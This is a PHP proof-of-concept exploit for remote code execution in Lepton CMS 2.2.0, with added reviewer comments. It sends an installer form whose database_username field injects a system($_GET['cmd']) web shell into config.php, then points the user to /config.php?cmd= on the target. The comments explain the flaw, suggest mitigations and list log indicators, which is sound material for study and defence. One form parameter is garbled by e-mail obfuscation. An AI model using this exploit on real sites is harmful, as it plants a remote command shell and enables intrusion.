<?php

/*
Lepton CMS v2.2.0 - Remote Code Execution.
Author: Hyp3rLinx
Exploit Author: ~
*/

// Endpoint the request is sent to: the CMS installer's save.php, here on a loopback lab host.
// NOTE(review): the script sends no credentials or session, so the installer is presumably
// reachable unauthenticated on the affected setup. Confirm against the vendor advisory.
$target = "http://127.0.0.1/lepton/install/save.php";
// Value submitted further down as the `database_username` form field.
// It opens with `');?>`, which closes a quoted string, a call and the enclosing PHP block,
// then starts a new PHP block that passes the `cmd` query parameter to system().
// The closing message in this script points at /config.php, so the installer presumably
// writes this field into that file without escaping it (inferred, not shown on this page).
// Mitigation: validate and escape installer input before it is written into a PHP file, and
// remove or block the install/ directory once setup is finished.
$payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";

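/**
 * Send an HTTP POST with cURL and return the transfer metadata.
 *
 * The response body is captured (so it is not echoed) and then discarded; callers receive
 * only the curl_getinfo() array, for example its 'http_code' entry.
 *
 * @param string $url       URL the request is posted to.
 * @param mixed  $post_data Value handed to CURLOPT_POSTFIELDS (this script passes a query string).
 * @return array Result of curl_getinfo() for the finished transfer.
 */
function curl_post($url, $post_data) {
        $ch = curl_init();
        curl_setopt_array($ch, [
                CURLOPT_URL => $url,
                // CURLOPT_POST is an on/off switch, so pass a boolean rather than an arbitrary integer.
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => $post_data,
                CURLOPT_RETURNTRANSFER => true,
                // Hard-coded, dated browser string; a fixed value like this is a usable indicator in web logs.
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
        ]);
        // The body is not needed by any caller, so the return value is intentionally not kept.
        curl_exec($ch);
        $info = curl_getinfo($ch);
        curl_close($ch);
        return $info;
}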

// Submits a full installer form to save.php. All fields are filler values except
// database_username, which carries $payload (interpolated into the double-quoted string).
// NOTE(review): the `&[email protected]` fragment is an artefact of the hosting site's e-mail
// obfuscation; the original parameter name and value cannot be recovered from this page.
$da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=127.0.0.1&database_username=$payload&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&[email protected]&admin_password=admin&admin_repassword=admin");
// Only the HTTP status is checked: a 200 shows that the installer answered, not that any
// file was modified, so the message below is not evidence of compromise on its own.
// Log patterns for defenders: a POST to /install/save.php on an already-installed site,
// PHP open/close tags inside form fields, and later GET requests to /config.php carrying
// a `cmd` query parameter.
if($da['http_code'] == 200) {
        echo "\nTada: Now visit /config.php?cmd= on target.\n";
}

?>

# siph0n [2016-08-25]